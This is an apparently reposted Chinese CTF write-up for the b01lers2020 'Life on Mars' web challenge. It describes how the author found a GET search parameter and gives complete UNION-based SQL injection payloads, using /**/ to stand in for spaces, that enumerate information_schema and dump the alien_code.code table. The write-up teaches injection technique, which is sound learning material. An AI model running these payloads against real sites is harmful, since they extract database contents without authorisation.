码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • [b01lers2020]Life on Mars (难发现的sql注入)


    [b01lers2020]Life on Mars

    打开界面以后,查看各种都没有提示,果断扫描目录,但也是没获得什么。

    到这里只能burp抓个包看看

     

     抓包两个界面发现了get传参,考虑是否存在sql注入

    尝试额以后发现只返回了一个1,试一下别的引号闭合

    直接union select 1,2#发现出现了回显位

     

    这里burp中sql注入不能出现空格,需要用/**/ 或者%20代替

    直接进行查询所有的数据库名

    search=hesperia_planum/**/union/**/select/**/database(),group_concat(schema_name)/**/from/**/information_schema.schemata#

     

     看一下alien_code数据库

    ?search=hesperia_planum/**/union/**/select/**/database(),group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="alien_code"#

    发现code表

    ?search=hesperia_planum/**/union/**/select/**/database(),group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="code"#

     

     ?search=hesperia_planum/**/union/**/select/**/group_concat(id),group_concat(code)/**/from/**/alien_code.code#

    这里是因为不是当前的数据库,表名前面需要加数据库的前缀

    总结:这道题难得不在sql注入,注入没有一点得过滤,最多是绕了个弯在别的数据库的表中,难得是找到sql注入的这个点,一般遇到这种界面就会f12源码查看信息,然后扫目录,最后burp查看一下界面,这种题目一般以xml实体注入较多,这里长个记性。

  • 相关阅读:
    算法拾遗十六二叉树相关算法
    洛谷 P2183 [国家集训队]礼物)(扩展卢卡斯定理)
    Java(八)----多线程
    微服务之SpringCloud
    One bite of Stream(7)
    Java实现微信支付
    基于知识蒸馏的两阶段去雨去雪去雾模型学习记录(二)之知识收集阶段
    这个算法不一般,控制拥塞有一手!
    Linux01(VM)
    安恒信息明御安全网关 suffix参数任意文件上传漏洞
  • 原文地址:https://blog.csdn.net/qq_62046696/article/details/127967409
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号